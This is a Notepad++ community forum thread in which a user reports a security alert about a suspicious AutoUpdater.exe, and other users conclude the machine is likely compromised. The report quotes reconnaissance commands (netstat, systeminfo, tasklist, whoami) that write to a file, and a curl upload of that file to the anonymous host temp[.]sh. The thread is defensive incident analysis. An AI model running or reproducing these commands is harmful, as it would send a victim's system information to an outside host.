Community
    • Login

    autoupdater and connection temp.sh

    Scheduled Pinned Locked Moved Security
    6 Posts 3 Posters 199 Views
    Loading More Posts
    • Oldest to Newest
    • Newest to Oldest
    • Most Votes
    Reply
    • Reply as topic
    Log in to reply
    This topic has been deleted. Only users with topic management privileges can see it.
    • S
      soft-parsley
      last edited by PeterJones

      Submission for any help regarding a finding that came through from AutoUpdater!?

      Malicious command seen:
      curl.exe -F "file=@a.txt" -s https://temp[.]sh/upload

      This command appears to be maliciously exfiltrating data in “a.txt” to malicious domain “https://temp[.]sh/upload”.

      The activity appears to have started from
      notepad++.exe

      This then spawned the command:
      "C:\\Program Files\\Notepad++\\updater\\gup.exe" -v8.84 -px64

      Which spawned:
      "C:\\Users\\[user]\\AppData\\Local\\Temp\\AutoUpdater.exe" /closeRunningNpp /S /runNppAfterSilentInstall

      The hash for “AutoUpdater.exe” is unknown.

      Other commands seen:

      cmd /c netstat -ano >> a.txt
cmd /c systeminfo >> a.txt
cmd /c tasklist >> a.txt
cmd /c whoami >> a.txt

      From the original malicious command, it appears system information from the user was saved to “a.txt” and then exfiltrated to “ttps://temp[.]sh/upload” which likely corresponds to blocklisted IP “51[.]91[.]79[.]17”

      —

      moderator added code markdown around text; please don’t forget to use the </> button to mark example text as “code” or `backticks` around inline code so that characters don’t get changed by the forum

      xomxX 1 Reply Last reply Reply Quote 0
      • PeterJonesP
        PeterJones
        last edited by

        @soft-parsley ,

        From my understanding, Notepad++'s gup.exe doesn’t use curl.exe, it uses the bundled libcurl.dll, which shouldn’t ever show up as curl.exe in any process list, as far as I understand things.

        Further, I cannot find systeminfo anywhere in the gup codebase, so I really don’t think a valid Notepad++ setup would be trying to make the calls that you’ve shown.

        @xomx knows a lot more about the gup/wingup than I do, but my initial conclusion is that what you’ve shown doesn’t come from the official Notepad++ gup.exe. (But it’s not unlikely that I’ve misunderstood, and it really would do the things listed above; I just don’t expect it to.)

        Some possibly-pertinent inforation:

        • Where did you download Notepad++ from?
          • Did you use https://notepad-plus-plus.org/downloads/ ?
          • Or https://github.com/notepad-plus-plus/notepad-plus-plus/releases ?
          • Or someplace else? If so, be precise about where (and use ` backticks around any URL, like `https://some.example/blah` (so that that the forum doesn’t automatically linkify it, to avoid people and crawlers from accidentally following that link)
        • What does Notepad++'s ?-menu’s Debug Info say?
        • What is the filesize, date, and Properties > Details for gup.exe and libcurl.dll and notepad++.exe ?
        S 2 Replies Last reply Reply Quote 1
        • S
          soft-parsley @PeterJones
          last edited by

          @PeterJones
          Notepad++ v8.8.4 (64-bit)
          Build time: Aug 4 2025 - 18:01:28
          Scintilla/Lexilla included: 5.5.7/5.4.5
          Boost Regex included: 1_85
          Path: C:\Program Files\Notepad++\notepad++.exe
          Command Line:
          Admin mode: OFF
          Local Conf mode: OFF
          Cloud Config: OFF
          Periodic Backup: ON
          Placeholders: OFF
          Scintilla Rendering Mode: SC_TECHNOLOGY_DIRECTWRITE (1)
          Multi-instance Mode: monoInst
          asNotepad: OFF
          File Status Auto-Detection: cdEnabledNew (for current file/tab only)
          Dark Mode: OFF
          Display Info:
          primary monitor: 1920x1080, scaling 100%
          visible monitors count: 3
          installed Display Class adapters:
          0000: Description - Intel® Iris® Xe Graphics
          0000: DriverVersion - 32.0.101.6556
          0001: Description - DisplayLink USB Device
          0001: DriverVersion - 12.1.2424.0
          0002: Description - DisplayLink USB Device
          0002: DriverVersion - 12.1.2424.0
          OS Name: Windows 11 Pro (64-bit)
          OS Version: 24H2
          OS Build: 26100.6584
          Current ANSI codepage: 1252
          Plugins:
          ColumnsPlusPlus (1.1.2)
          CSVLint (0.4.6.7)
          JsonTools (8)
          mimeTools (3.1)
          NppConverter (4.6)
          NppExport (0.4)
          XMLTools (3.1.1.13)

          1 Reply Last reply Reply Quote 0
          • S
            soft-parsley @PeterJones
            last edited by

            @PeterJones
            gup.exe : 807,936 byes, created Sunday, August 10, 2025
            libcurl.dll : 818,688 bytes, created Sunday, August 10, 2025
            notepad++.exe : 8,699,392 bytes , created Sunday, August 10, 2025

            PeterJonesP 1 Reply Last reply Reply Quote 0
            • PeterJonesP
              PeterJones @soft-parsley
              last edited by

              @soft-parsley said,

              Notepad++ v8.8.4 (64-bit)
              Build time: Aug 4 2025 - 18:01:28

              and

              gup.exe : 807,936 byes, created Sunday, August 10, 2025
              libcurl.dll : 818,688 bytes, created Sunday, August 10, 2025
              notepad++.exe : 8,699,392 bytes , created Sunday, August 10, 2025

              Hmm… Those all match with what I see for a correct Notepad++ v8.8.4.

              I don’t know why you would see curl.exe rather than curl.dll, or the strange URL and AutoUpdater.exe, because I really wouldn’t expect that as normal behavior. I think you’re going to have to wait for @xomx or someone else more knowledgable than I am about the updater process, because the files look right to me, but the activities seem weird, to me.

              1 Reply Last reply Reply Quote 0
              • xomxX
                xomx @soft-parsley
                last edited by xomx

                @soft-parsley

                Unfortunately, I’ve a bad news for you, if you didn’t somehow initialize all of this yourself, your comp is no longer yours…

                t e m p . s h seems to be a kind of non-permanent storage, anyone can use it:

                temp.sh.png

                Notepad++ doesn’t distribute/use curl.exe binary, it uses the curl-library functionality via “C:\Program Files\Notepad++\updater\libcurl.dll” for the N++ updater GUP.exe. And of course N++ never uses such an anonymous storage place.

                Also you should check the digital signatures of your N++ binaries like:

                npp-sign.png

                Moreover, nowadays it isn’t possible to download or update to N++ v8.8.4, as this specific version was withdrawn because it contained regressions.

                1 Reply Last reply Reply Quote 2
                • First post
                  Last post
                The Community of users of the Notepad++ text editor.
                Powered by NodeBB | Contributors